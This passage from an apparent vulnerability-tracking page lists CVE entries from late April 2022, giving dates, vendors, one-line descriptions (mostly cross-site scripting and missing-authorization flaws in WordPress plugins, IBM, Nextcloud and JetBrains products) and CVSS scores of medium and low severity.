2022-04-28 | CVE-2022-1514 | Facturascripts | Cross-site Scripting vulnerability in Facturascripts Stored XSS via upload plugin functionality in zip format in GitHub repository neorazorx/facturascripts prior to 2022.06. | 5.4 |
2022-04-28 | CVE-2022-22322 | IBM | Cross-site Scripting vulnerability in IBM Infosphere Information Server 11.7 IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. | 5.4 |
2022-04-28 | CVE-2022-22443 | IBM | Cross-site Scripting vulnerability in IBM Infosphere Information Server 11.7 IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. | 5.4 |
2022-04-28 | CVE-2022-29584 | Mahara | Cross-site Scripting vulnerability in Mahara Mahara before 20.10.5, 21.04.4, 21.10.2, and 22.04.0 allows stored XSS when a particular Cascading Style Sheets (CSS) class for embedly is used, and JavaScript code is constructed to perform an action. | 5.4 |
2022-04-28 | CVE-2022-28102 | PHP Mysql Admin Panel Generator Project | Cross-site Scripting vulnerability in PHP Mysql Admin Panel Generator Project PHP Mysql Admin Panel Generator A cross-site scripting (XSS) vulnerability in PHP MySQL Admin Panel Generator v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected at /edit-db.php. | 5.4 |
2022-04-27 | CVE-2021-34590 | Bender | Unspecified vulnerability in Bender Cc612 Firmware and Icc15Xx Firmware In Bender/ebee Charge Controllers, multiple versions are prone to Cross-site Scripting. | 5.4 |
2022-04-27 | CVE-2022-1503 | GET Simple | Cross-site Scripting vulnerability in Get-Simple Getsimple CMS A vulnerability, which was classified as problematic, has been found in GetSimple CMS. | 5.4 |
2022-04-26 | CVE-2022-28450 | Nopcommerce | Cross-site Scripting vulnerability in Nopcommerce 4.50.1 nopCommerce 4.50.1 is vulnerable to Cross Site Scripting (XSS) via the "Text" parameter (forums) when creating a new post, which allows a remote attacker to execute arbitrary JavaScript code at client browser. | 5.4 |
2022-04-26 | CVE-2022-28522 | Zcms Project | Cross-site Scripting vulnerability in Zcms Project Zcms 20170206 ZCMS v20170206 was discovered to contain a stored cross-site scripting (XSS) vulnerability via index.php?m=home&c=message&a=add. | 5.4 |
2022-04-26 | CVE-2022-28448 | Nopcommerce | Cross-site Scripting vulnerability in Nopcommerce 4.50.1 nopCommerce 4.50.1 is vulnerable to Cross Site Scripting (XSS). | 5.4 |
2022-04-26 | CVE-2021-36867 | Psychological Tests Quizzes Project | Unspecified vulnerability in Psychological Tests & Quizzes Project Psychological Tests & Quizzes 0.21.19 Stored Cross-Site Scripting (XSS) vulnerability in Alexander Ustimenko's Psychological tests & quizzes plugin <= 0.21.19 on WordPress is possible for users with contributor or higher user rights. | 5.4 |
2022-04-26 | CVE-2022-27854 | Psychological Tests Quizzes Project | Unspecified vulnerability in Psychological Tests & Quizzes Project Psychological Tests & Quizzes 0.21.19 Stored Cross-Site Scripting (XSS) vulnerability in Alexander Ustimenko's Psychological tests & quizzes plugin <= 0.21.19 on WordPress is possible for users with contributor or higher role via the &wpt_test_page_submit_button_caption parameter. | 5.4 |
2022-04-26 | CVE-2022-1173 | Getgrav | Cross-site Scripting vulnerability in Getgrav Grav stored xss in GitHub repository getgrav/grav prior to 1.7.33. | 5.4 |
2022-04-25 | CVE-2022-0398 | Caseproof | Missing Authorization vulnerability in Caseproof Thirstyaffiliates Affiliate Link Manager The ThirstyAffiliates Affiliate Link Manager WordPress plugin before 3.10.5 does not have authorisation and CSRF checks when creating affiliate links, which could allow any authenticated user, such as a subscriber, to create arbitrary affiliate links, which could then be used to redirect users to an arbitrary website. | 5.4 |
2022-04-25 | CVE-2022-1152 | Menubar | Unspecified vulnerability in Menubar The Menubar WordPress plugin before 5.8 does not sanitise and escape the command parameter before outputting it back in the response via the menubar AJAX action (available to any authenticated user), leading to Reflected Cross-Site Scripting. | 5.4 |
2022-04-25 | CVE-2022-27428 | Gallerycms Project | Cross-site Scripting vulnerability in Gallerycms Project Gallerycms 2.0 A stored cross-site scripting (XSS) vulnerability in /index.php/album/add of GalleryCMS v2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the album_name parameter. | 5.4 |
2022-04-25 | CVE-2022-1457 | Facturascripts | Cross-site Scripting vulnerability in Facturascripts Store XSS in title parameter executing at EditUser Page & EditProducto page in GitHub repository neorazorx/facturascripts prior to 2022.04. | 5.4 |
2022-04-25 | CVE-2022-1458 | Open EMR | Cross-site Scripting vulnerability in Open-Emr Openemr Stored XSS Leads To Session Hijacking in GitHub repository openemr/openemr prior to 6.1.0.1. | 5.4 |
2022-04-28 | CVE-2022-29869 | Samba Fedoraproject Debian | Information Exposure Through Log Files vulnerability in multiple products cifs-utils through 6.14, with verbose logging, can cause an information leak when a file contains = (equal sign) characters but is not a valid credentials file. | 5.3 |
2022-04-27 | CVE-2022-22276 | Sonicwall | Information Exposure vulnerability in Sonicwall products A vulnerability in the SonicOS SNMP service results in exposure of sensitive information to an unauthorized user. | 5.3 |
2022-04-27 | CVE-2022-22277 | Sonicwall | Information Exposure vulnerability in Sonicwall products A vulnerability in the SonicOS SNMP service results in exposure of Wireless Access Point sensitive information in cleartext. | 5.3 |
2022-04-27 | CVE-2021-34587 | IBM Bender | Out-of-bounds Write vulnerability in multiple products In multiple versions of Bender/ebee Charge Controllers, a long URL could lead to a web server crash. | 5.3 |
2022-04-27 | CVE-2021-38939 | IBM | Information Exposure Through Log Files vulnerability in IBM Qradar Security Information and Event Manager IBM QRadar SIEM 7.3, 7.4, and 7.5 stores potentially sensitive information in log files that could be read by a user with access to creating domains. | 5.3 |
2022-04-27 | CVE-2021-46423 | Telesquare | Unspecified vulnerability in Telesquare Tlr-2005Ksh Firmware 1.0.0 Telesquare TLR-2005KSH 1.0.0 is affected by an unauthenticated file download vulnerability that allows a remote attacker to download a full configuration file. | 5.3 |
2022-04-27 | CVE-2021-41041 | Eclipse Oracle | Unchecked Return Value vulnerability in multiple products In Eclipse Openj9 before version 0.32.0, Java 8 & 11 fail to throw the exception captured during bytecode verification when verification is triggered by a MethodHandle invocation, allowing unverified methods to be invoked using MethodHandles. | 5.3 |
2022-04-25 | CVE-2022-24880 | Flask Session Captcha Project | Improper Check for Unusual or Exceptional Conditions vulnerability in Flask-Session-Captcha Project Flask-Session-Captcha flask-session-captcha is a package which allows users to extend Flask by adding an image based captcha stored in a server side session. | 5.3 |
2022-04-27 | CVE-2022-28197 | Nvidia | Integer Overflow or Wraparound vulnerability in Nvidia Jetson Linux NVIDIA Jetson Linux Driver Package contains a vulnerability in the Cboot ext4_mount function, where insufficient validation of untrusted data may allow a highly privileged local attacker to cause an integer overflow. | 5.0 |
2022-04-28 | CVE-2022-24898 | Xwiki | XXE vulnerability in Xwiki Commons org.xwiki.commons:xwiki-commons-xml is a common module used by other XWiki top level projects. | 4.9 |
2022-04-28 | CVE-2021-43930 | Smartptt | Unspecified vulnerability in Smartptt Scada 1.1 Elcomplus SmartPTT is vulnerable as the backup and restore system does not adequately validate download requests, enabling malicious users to perform path traversal attacks and potentially download arbitrary files from the system. | 4.9 |
2022-04-28 | CVE-2022-28117 | Naviwebs | Server-Side Request Forgery (SSRF) vulnerability in Naviwebs Navigate CMS 2.9.4 A Server-Side Request Forgery (SSRF) in feed_parser class of Navigate CMS v2.9.4 allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter. | 4.9 |
2022-04-25 | CVE-2022-0477 | Gitlab | Unspecified vulnerability in Gitlab An issue has been discovered in GitLab affecting all versions starting from 11.9 before 14.5.4, all versions starting from 14.6.0 before 14.6.4, all versions starting from 14.7.0 before 14.7.1. | 4.9 |
2022-04-30 | CVE-2021-41993 | Pingidentity | Use of Insufficiently Random Values vulnerability in Pingidentity Pingid and Pingid Windows Login A misconfiguration of RSA in PingID Android app prior to 1.19 is vulnerable to pre-computed dictionary attacks, leading to an offline MFA bypass when using PingID Windows Login. | 4.8 |
2022-04-30 | CVE-2021-41994 | Pingidentity | Use of Insufficiently Random Values vulnerability in Pingidentity Pingid and Pingid Windows Login A misconfiguration of RSA in PingID iOS app prior to 1.19 is vulnerable to pre-computed dictionary attacks, leading to an offline MFA bypass when using PingID Windows Login. | 4.8 |
2022-04-28 | CVE-2022-29811 | Jetbrains | Cross-site Scripting vulnerability in Jetbrains HUB In JetBrains Hub before 2022.1.14638, stored XSS via the project icon was possible. | 4.8 |
2022-04-27 | CVE-2022-22345 | IBM | Cross-site Scripting vulnerability in IBM Qradar Security Information and Event Manager IBM QRadar 7.3, 7.4, and 7.5 is vulnerable to cross-site scripting. | 4.8 |
2022-04-25 | CVE-2022-29418 | Night Mode Project | Unspecified vulnerability in Night Mode Project Night Mode Authenticated (admin user role) Persistent Cross-Site Scripting (XSS) in Mark Daniels' Night Mode plugin <= 1.0.0 on WordPress via vulnerable parameters: &ntmode_page_setting[enable-me], &ntmode_page_setting[bg-color], &ntmode_page_setting[txt-color], &ntmode_page_setting[anc_color]. | 4.8 |
2022-04-25 | CVE-2022-0876 | Wpdevart | Unspecified vulnerability in Wpdevart Social Comments The Social comments by WpDevArt WordPress plugin before 2.5.0 does not sanitise and escape its settings, allowing high-privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed. | 4.8 |
2022-04-25 | CVE-2022-1027 | Minioragne | Unspecified vulnerability in Minioragne Page Restriction The Page Restriction WordPress (WP) plugin before 1.2.7 allows bad actors with administrator privileges to inject JavaScript code into its settings via the settings page, leading to stored Cross-Site Scripting that will only affect administrator users. | 4.8 |
2022-04-25 | CVE-2022-1094 | Anmari | Unspecified vulnerability in Anmari AMR Users The amr users WordPress plugin before 4.59.4 does not sanitise and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. | 4.8 |
2022-04-25 | CVE-2022-1153 | Layslider | Unspecified vulnerability in Layslider The LayerSlider WordPress plugin before 7.1.2 does not sanitise and escape a project's slug before outputting it back in various places, which could allow high-privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. | 4.8 |
2022-04-25 | CVE-2022-1156 | Books Papers Project | Cross-site Scripting vulnerability in Books & Papers Project Books & Papers The Books & Papers WordPress plugin through 0.20210223 does not escape its Custom DB prefix settings, allowing high-privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. | 4.8 |
2022-04-25 | CVE-2022-1228 | Opensea Project | Unspecified vulnerability in Opensea Project Opensea The Opensea WordPress plugin before 1.0.3 does not sanitize and escape some of its settings, like its "Referer address" field, which could allow high-privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. | 4.8 |
2022-04-25 | CVE-2022-1396 | Donorbox | Unspecified vulnerability in Donorbox The Donorbox WordPress plugin before 7.1.7 does not sanitise and escape its Campaign URL settings before outputting it in an attribute, leading to a Stored Cross-Site Scripting issue even when the unfiltered_html capability is disallowed. | 4.8 |
2022-04-27 | CVE-2022-24372 | Linksys | Link Following vulnerability in Linksys Mr9600 Firmware Linksys MR9600 devices before 2.0.5 allow attackers to read arbitrary files via a symbolic link to the root directory of a NAS SMB share. | 4.6 |
2022-04-27 | CVE-2022-28196 | Nvidia | Out-of-bounds Write vulnerability in Nvidia Jetson Linux NVIDIA Jetson Linux Driver Package contains a vulnerability in the Cboot blob_decompress function, where insufficient validation of untrusted data may allow a local attacker with elevated privileges to cause a memory buffer overflow, which may lead to code execution, limited loss of Integrity, and limited denial of service. | 4.6 |
2022-04-29 | CVE-2022-0984 | Moodle Fedoraproject Redhat | Incorrect Authorization vulnerability in multiple products Users with the capability to configure badge criteria (teachers and managers by default) were able to configure course badges with profile field criteria, which should only be available for site badges. | 4.3 |
2022-04-29 | CVE-2022-0985 | Moodle | Incorrect Authorization vulnerability in Moodle Insufficient capability checks could allow users with the moodle/site:uploadusers capability to delete users, without having the necessary moodle/user:delete capability. | 4.3 |
2022-04-29 | CVE-2022-29903 | Mediawiki | Cross-Site Request Forgery (CSRF) vulnerability in Mediawiki The Private Domains extension for MediaWiki through 1.37.2 (before 1ad65d4c1c199b375ea80988d99ab51ae068f766) allows CSRF for editing pages that store the extension's configuration. | 4.3 |
2022-04-29 | CVE-2022-29905 | Mediawiki | Cross-Site Request Forgery (CSRF) vulnerability in Mediawiki The FanBoxes extension for MediaWiki through 1.37.2 (before 027ffb0b9d6fe0d823810cf03f5b562a212162d4) allows Special:UserBoxes CSRF. | 4.3 |
2022-04-27 | CVE-2021-29776 | IBM | Unspecified vulnerability in IBM Qradar Security Information and Event Manager IBM QRadar SIEM 7.3, 7.4, and 7.5 could allow an authenticated user to obtain sensitive information from another user's dashboard providing the dashboard ID of that user. | 4.3 |
2022-04-27 | CVE-2021-38874 | IBM | Unspecified vulnerability in IBM Qradar Security Information and Event Manager IBM QRadar SIEM 7.3, 7.4, and 7.5 allows for users to access information across tenant and domain boundaries in some situations. | 4.3 |
2022-04-27 | CVE-2022-24888 | Nextcloud | Unspecified vulnerability in Nextcloud Server Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform. | 4.3 |
2022-04-27 | CVE-2022-24889 | Nextcloud | Unspecified vulnerability in Nextcloud Server Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform. | 4.3 |
2022-04-27 | CVE-2022-27331 | Zammad | Exposure of Resource to Wrong Sphere vulnerability in Zammad An access control issue in Zammad v5.0.3 broadcasts administrative configuration changes to all users who have an active application instance, including settings that should only be visible to authenticated users. | 4.3 |
2022-04-26 | CVE-2022-24866 | Discourse | Information Exposure vulnerability in Discourse Assign Discourse Assign is a plugin for assigning users to a topic in Discourse, an open-source messaging platform. | 4.3 |
2022-04-25 | CVE-2022-29417 | Shortpixel | Unspecified vulnerability in Shortpixel Adaptive Images Plugin Settings Update vulnerability in ShortPixel's ShortPixel Adaptive Images plugin <= 3.3.1 on WordPress allows an attacker with a low user role, such as subscriber or higher, to change the plugin settings. | 4.3 |
2022-04-25 | CVE-2021-24800 | Designwall | Authorization Bypass Through User-Controlled Key vulnerability in Designwall DW Question & Answer The DW Question & Answer Pro WordPress plugin through 1.3.4 does not check that the comment to edit belongs to the user making the request, allowing any user to edit other users' comments. | 4.3 |
2022-04-25 | CVE-2021-24805 | Designwall | Unspecified vulnerability in Designwall DW Question & Answer The DW Question & Answer Pro WordPress plugin through 1.3.4 does not properly check for CSRF in some of its functions, allowing attackers to make logged-in users perform unwanted actions, such as updating a comment or a question status. | 4.3 |
2022-04-25 | CVE-2022-0287 | Mycred | Missing Authorization vulnerability in Mycred The myCred WordPress plugin before 2.4.4.1 does not have any authorisation in place in its mycred-tools-select-user AJAX action, allowing any authenticated user, such as a subscriber, to call it and retrieve all email addresses from the blog. | 4.3 |
2022-04-25 | CVE-2022-0363 | Mycred | Missing Authorization vulnerability in Mycred The myCred WordPress plugin before 2.4.3.1 does not have any authorisation and CSRF checks in the mycred-tools-import-export AJAX action, allowing any authenticated users, such as subscribers, to call it and import mycred setup, thus creating badges, managing points or creating arbitrary posts. | 4.3 |
2022-04-25 | CVE-2022-0634 | Caseproof | Missing Authorization vulnerability in Caseproof Thirstyaffiliates Affiliate Link Manager The ThirstyAffiliates WordPress plugin before 3.10.5 lacks authorization checks in the ta_insert_external_image action, allowing a low-privilege user (with a role as low as Subscriber) to add an image from an external URL to an affiliate link. | 4.3 |
2022-04-25 | CVE-2022-1092 | Mycred | Missing Authorization vulnerability in Mycred The myCred WordPress plugin before 2.4.3.1 does not have authorisation and CSRF checks in its mycred-tools-import-export AJAX action, allowing any authenticated user to call it and retrieve the list of email addresses present in the blog. | 4.3 |
8 Low Vulnerabilities
DATE | CVE | VENDOR | VULNERABILITY | CVSS |
---|---|---|---|---|
2022-04-27 | CVE-2021-25266 | Sophos | Insecure Storage of Sensitive Information vulnerability in Sophos Authenticator and Intercept X An insecure data storage vulnerability allows a physical attacker with root privileges to retrieve TOTP secret keys from unlocked phones in Sophos Authenticator for Android version 3.4 and older, and Intercept X for Mobile (Android) before version 9.7.3495. | 3.9 |
2022-04-27 | CVE-2022-24886 | Nextcloud | Incorrect Permission Assignment for Critical Resource vulnerability in Nextcloud Nextcloud Android app is the Android client for Nextcloud, a self-hosted productivity platform. | 3.8 |
2022-05-01 | CVE-2022-21149 | S Cart | Cross-site Scripting vulnerability in S-Cart The packages s-cart/s-cart before 6.9 and s-cart/core before 6.9 are vulnerable to Cross-site Scripting (XSS), which can lead to cookie theft from any victim who visits the affected URL, so that the attacker can gain unauthorized access to that user's account through the stolen cookie. | 3.5 |
2022-04-28 | CVE-2022-29820 | Jetbrains | Exposure of Resource to Wrong Sphere vulnerability in Jetbrains Pycharm In JetBrains PyCharm before 2022.1, exposure of the debugger port to the internal network was possible. | 3.5 |
2022-04-29 | CVE-2022-1249 | Pesign Project | NULL Pointer Dereference vulnerability in Pesign Project Pesign A NULL pointer dereference flaw was found in pesign's cms_set_pw_data() function of the cms_common.c file. | 3.3 |
2022-04-28 | CVE-2022-29816 | Jetbrains | Cross-site Scripting vulnerability in Jetbrains Intellij Idea In JetBrains IntelliJ IDEA before 2022.1, HTML injection into IDE messages was possible. | 3.2 |
2022-04-27 | CVE-2022-24885 | Nextcloud | Improper Authentication vulnerability in Nextcloud Nextcloud Android app is the Android client for Nextcloud, a self-hosted productivity platform. | 2.4 |
2022-04-28 | CVE-2022-29812 | Jetbrains | Unspecified vulnerability in Jetbrains Intellij Idea In JetBrains IntelliJ IDEA before 2022.1, notification mechanisms about the use of Unicode directionality formatting characters were insufficient. | 2.3 |